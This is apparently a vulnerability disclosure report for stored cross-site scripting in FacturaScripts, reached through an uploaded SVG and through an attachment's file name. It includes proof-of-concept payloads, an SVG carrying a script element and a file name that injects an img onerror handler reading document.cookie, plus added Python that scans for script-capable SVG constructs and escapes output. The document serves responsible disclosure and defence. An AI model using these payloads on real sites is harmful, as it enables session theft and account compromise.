Multiple Stored XSS via SVG file upload and the file name of an attachment in neorazorx/facturascripts


Reported on Apr 27th 2022


Hi there, FacturaScripts is vulnerable to stored XSS via uploading an SVG file, and via the file name of the upload.

Steps to reproduce with an SVG file

Log in as admin, or as any account that has the Admin -> Library role, go to Admin -> Library -> New and upload an SVG file with this content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
   /* script body not included in the report */
   </script>
</svg>

Save this. The XSS will trigger when you download it.


Steps to reproduce with the file name payload:

Just upload a file with the file name: %22><img src=x onerror=alert(document.cookie).xlsx -> the XSS will trigger.


This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.
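The two vectors in the report come from the same root cause: attacker-controlled bytes (an SVG body, a file name) reach the browser in a context where they are interpreted as markup or script. The following is an added example, not FacturaScripts code and not the researcher's: it holds a constructed SVG in the shape of the report's payload, a constructed file name equivalent to the report's (the %22 written as the double quote it decodes to), a scanner for script-capable SVG constructs, the vulnerable attribute interpolation beside its escaped form, and the response headers that make a download a download. All function names and sample inputs are assumptions made for the demonstration.

```python
"""
Added example (not FacturaScripts code): the two stored-XSS vectors from the
report, an SVG carrying a <script> element and a file name that breaks out of
an HTML attribute, next to the server-side checks that close them. All names
and sample inputs here are constructed for the demonstration.
"""
import html
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Constructed SVG in the shape of the report's payload (script body is ours).
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(document.domain)</script>
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>"""

# The report's file name, with %22 written as the double quote it decodes to.
ATTACHMENT_NAME = '"><img src=x onerror=alert(document.cookie)>.xlsx'

# Elements through which an SVG can run script when a browser renders it as
# a document (opened directly or in a frame, not when embedded via <img>).
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}


def svg_active_content(data: bytes) -> list[str]:
    """Return findings for script-capable constructs in an SVG; [] means clean.
    For production use parse with defusedxml to also neutralise entity attacks."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for elem in root.iter():
        local = elem.tag.rsplit("}", 1)[-1].lower()   # strip the namespace
        if local in ACTIVE_ELEMENTS:
            findings.append(f"<{local}> element")
        for name, value in elem.attrib.items():
            attr = name.rsplit("}", 1)[-1].lower()     # handles xlink:href too
            if attr.startswith("on"):
                findings.append(f"event handler {attr} on <{local}>")
            elif attr == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL on <{local}>")
    return findings


def link_unescaped(filename: str) -> str:
    """Vulnerable rendering: the name is dropped into markup as-is, so a name
    containing "> closes the attribute and injects a new element."""
    return f'<a href="/download/{filename}" title="{filename}">{filename}</a>'


def link_escaped(filename: str) -> str:
    """Hardened rendering: percent-encode the name inside the URL and HTML-escape
    it (quotes included) wherever it lands in attribute or text context."""
    safe = html.escape(filename, quote=True)
    return f'<a href="/download/{urllib.parse.quote(filename)}" title="{safe}">{safe}</a>'


def download_headers(filename: str, content_type: str) -> dict[str, str]:
    """Headers for serving a stored attachment: force a download instead of
    rendering it, stop MIME sniffing, and sandbox it if it is rendered anyway."""
    ascii_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename) or "download"
    encoded = urllib.parse.quote(filename)
    return {
        "Content-Type": content_type,
        "Content-Disposition": f"attachment; filename=\"{ascii_name}\"; filename*=UTF-8''{encoded}",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'; style-src 'unsafe-inline'",
    }


def vet_upload(filename: str, data: bytes) -> list[str]:
    """Upload-time gate combining both checks; an empty list means accept."""
    problems = []
    if filename.lower().endswith(".svg") or data.lstrip().startswith((b"<?xml", b"<svg")):
        problems += svg_active_content(data)
    if re.search(r"""[<>"'/\\\x00-\x1f]""", filename):
        problems.append("file name contains markup or path characters")
    return problems


if __name__ == "__main__":
    print(vet_upload("logo.svg", MALICIOUS_SVG))
    print(vet_upload(ATTACHMENT_NAME, b"PK\x03\x04"))
    print(link_escaped(ATTACHMENT_NAME))
```

The SVG scan is a defence-in-depth measure rather than the primary fix: the decisive control is serving stored files with Content-Disposition: attachment and nosniff, because an SVG that never renders as a top-level document cannot execute its script, and an SVG can still carry script through constructs a blocklist misses. The file-name fix is the usual one, output encoding at the point where the name is written into HTML; rejecting names with markup characters at upload is an extra layer, not a substitute.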

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours.
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back.
Carlos Garcia validated this vulnerability.
minhnb has been awarded the disclosure bounty.
Carlos Garcia confirmed that a fix has been merged on 1d1edb.


Carlos Garcia
a month ago


You're right. I have corrected it in this commit

Thank you so much for everything
